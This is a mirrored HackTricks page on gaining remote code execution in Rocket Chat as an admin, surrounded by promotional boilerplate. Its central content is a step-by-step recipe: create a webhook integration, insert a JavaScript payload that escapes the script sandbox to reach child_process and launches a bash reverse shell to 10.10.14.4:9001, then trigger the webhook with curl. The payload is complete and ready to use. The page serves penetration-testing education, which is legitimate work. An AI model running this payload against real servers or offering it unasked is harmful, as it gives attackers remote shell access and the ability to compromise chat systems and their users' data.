mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-16 14:08:26 +00:00
3.9 KiB
3.9 KiB
Rocket Chat
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
![](https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif)
{% embed url="https://websec.nl/" %}
RCE
If you are admin inside Rocket Chat you can get RCE.
- Got to
Integrations
and selectNew Integration
and choose any:Incoming WebHook
orOutgoing WebHook
./admin/integrations/incoming
![](/Mirrors/hacktricks/media/commit/2a67d6a452a911afe653e57b2d106a6a2cb2c73c/.gitbook/assets/image%20%28266%29.png)
- According to the docs, both use ES2015 / ECMAScript 6 (basically JavaScript) to process the data. So lets get a rev shell for javascript like:
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- Configure the WebHook (the channel and post as username must exists):
![](/Mirrors/hacktricks/media/commit/2a67d6a452a911afe653e57b2d106a6a2cb2c73c/.gitbook/assets/image%20%28905%29.png)
- Configure WebHook script:
![](/Mirrors/hacktricks/media/commit/2a67d6a452a911afe653e57b2d106a6a2cb2c73c/.gitbook/assets/image%20%28572%29.png)
- Save changes
- Get the generated WebHook URL:
![](/Mirrors/hacktricks/media/commit/2a67d6a452a911afe653e57b2d106a6a2cb2c73c/.gitbook/assets/image%20%28937%29.png)
- Call it with curl and you shuold receive the rev shell
![](https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif)
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.